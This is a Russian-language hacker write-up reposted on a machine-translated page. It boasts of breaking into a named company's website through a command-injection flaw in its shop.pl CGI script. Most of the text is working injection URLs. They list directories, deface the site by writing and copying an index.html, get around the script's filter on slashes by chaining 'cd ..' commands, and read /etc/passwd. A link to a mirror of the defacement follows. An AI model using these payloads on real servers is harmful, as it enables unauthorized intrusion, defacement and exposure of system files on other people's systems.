This page has been robot translated, sorry for typos if any. Original content here.

Уязвимость www.hawk-assoc.com на скрипте shop.pl

 

Как-то, наткнулся я на сайте www.hawk-assoc.com на скрипт shop.pl. скрипт обрабатывал следующий запрос:
http://www.xxx.com/cgi-local/shop.pl/page=index.html
сразу всполмился довольно старый баг в этом скрипте (возможность выполнения команд):
http://www.xxx.com/cgi-local/shop.pl/page=;ls|
http://www.xxx.com/cgi-local/shop.pl/page=;id|
http://www.xxx.com/cgi-local/shop.pl/page=;cat shop.pl|
собственно выполнить дефейс не предстовляло особой сложности.
для начала создавался файл index.html:
http://www.xxx.com/cgi-local/shop.pl/page=;echo deface:durito>index.html|
далее созданный файл копировался в директорию выше:
http://www.xxx.com/cgi-local/shop.pl/page=;cp index.html ..|
вот и весь дефейс. но ведь интересно было и по другим директориям походить. но скрипт упорно резал /, так что команда:
http://www.xxx.com/cgi-local/shop.pl/page=;ls ../cgi-bin| - не
работала, скрипт выдавал сообщение об ошибке. но тут я вспомнил о символе ;! С помощью него можно выполнять команды последовательно.
Выполнение каждой последующей команды начинается только после полного завершения
предыдущей.
Ввожу следующую команду:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;ls| и вижу листинг каталога вернего уровня. и так далее:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd ..;ls| добрался и до корня. путешествие по папкам тоже не представляло сложности:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd ..;cd etc;ls|
вот и злополучный passwd нашелся:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd ..;cd etc;cat passwd|
и так далее. вот собственно и все.
а вот и зеркало взлома:
http://taxidermia.void.ru/mirrors/2003/09/22/www.hawk-assoc.com

Твой bug Durito.
_________________
EAT THE RICH!


Дата створення/оновлення: 25.05.2018

stop war in Ukraine

ukrTrident

stand with Ukraine